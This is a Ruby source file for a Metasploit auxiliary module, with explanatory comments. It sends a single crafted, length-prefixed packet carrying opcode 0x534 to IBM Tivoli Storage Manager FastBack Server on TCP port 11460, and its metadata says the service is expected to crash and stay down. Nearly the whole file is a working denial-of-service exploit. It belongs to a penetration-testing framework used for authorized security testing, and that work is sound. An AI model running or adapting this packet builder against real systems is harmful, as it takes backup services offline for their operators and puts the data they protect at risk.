GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/misc/ibm_tsm_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary denial-of-service module for IBM Tivoli Storage Manager FastBack
# Server (references: EDB 38979, OSVDB 132307).
#
# One framed packet carrying opcode 0x534 is written to the target over TCP
# (default RPORT 11460). The module metadata declares CRASH_SERVICE_DOWN, i.e.
# the service is expected to stay down after a successful run.
#
# The module does not probe the service after sending, so "Packet sent!" only
# means the write completed; whether the service actually went down has to be
# confirmed separately.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers the module metadata and the default target port.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service',
        'Description' => %q{
          This module exploits a denial of service condition present in IBM Tivoli Storage Manager
          FastBack Server when dealing with packets triggering the opcode 0x534 handler.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Gianni Gnesa', # Public disclosure/Proof of Concept
          'William Webb <william_webb[at]rapid7.com>', # Metasploit
        ],
        'References' => [
          ['EDB', '38979'],
          ['OSVDB', '132307']
        ],
        'DisclosureDate' => '2015-12-15',
        'Notes' => {
          # Stability is the only populated category: the service is expected to go down.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([Opt::RPORT(11460)])
  end

  # Builds one length-prefixed packet.
  #
  # Layout, as produced by the pack directives below:
  #   * 4 bytes   - big-endian ('N') length of everything that follows
  #   * 12 bytes  - random alphabetic filler
  #   * 7 x 4 bytes, little-endian ('V'): opcode, 0, len(p1), len(p1),
  #                 len(p2), len(p1) + len(p2), len(p3)
  #   * 8 bytes   - random alphabetic filler
  #   * p1, p2, p3 concatenated
  #
  # The filler is regenerated on every call, so only the opcode, the length
  # fields and any fixed text in the parameters are stable across packets.
  # How the server interprets the individual fields is not shown in this file.
  #
  # NOTE(review): sizes come from String#length (characters); that equals the
  # byte count for the ASCII strings passed by #run - confirm before reusing
  # this helper with non-ASCII input.
  #
  # @param opcode [Integer] value written into the first 32-bit header field
  # @param p1 [String] first variable-length parameter
  # @param p2 [String] second variable-length parameter
  # @param p3 [String] third variable-length parameter
  # @return [String] the framed packet
  def tv_pkt(opcode, p1 = '', p2 = '', p3 = '')
    leading_filler = Rex::Text.rand_text_alpha(0x0C)
    header_fields = [
      opcode,
      0x00,
      p1.length,
      p1.length,
      p2.length,
      p1.length + p2.length,
      p3.length
    ].pack('V*')
    trailing_filler = Rex::Text.rand_text_alpha(0x08)

    body = leading_filler + header_fields + trailing_filler + p1 + p2 + p3

    # Prefix the body with its own length in network byte order.
    [body.length].pack('N') << body
  end

  # Connects to the target, writes a single opcode 0x534 packet and disconnects.
  #
  # Connection-level failures listed in the rescue clause are reported and
  # logged rather than raised; the socket is released in every case.
  #
  # @return [void]
  def run
    opcode = 0x534
    connect
    print_status("Connected to: #{rhost} port: #{rport}")
    print_status('Sending malicious packet')

    # Only the "File: ... From: 0 To: 0 ChunkLoc: 0 FileLoc: 0" template is
    # fixed; the 0x200-byte name and both 0x60-byte fields are random per run.
    file_record = "File: #{Rex::Text.rand_text_alpha(0x200)} From: 0 To: 0 ChunkLoc: 0 FileLoc: 0"
    second_field = Rex::Text.rand_text_alpha(0x60)
    third_field = Rex::Text.rand_text_alpha(0x60)

    packet = tv_pkt(opcode, file_record, second_field, third_field)

    sock.put(packet)
    print_status('Packet sent!')
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable,
         Rex::ConnectionTimeout, Rex::ConnectionRefused,
         ::Timeout::Error, ::EOFError => e
    print_error("Exploit failed: #{e.class} #{e.message}")
    elog(e)
  ensure
    disconnect
  end
end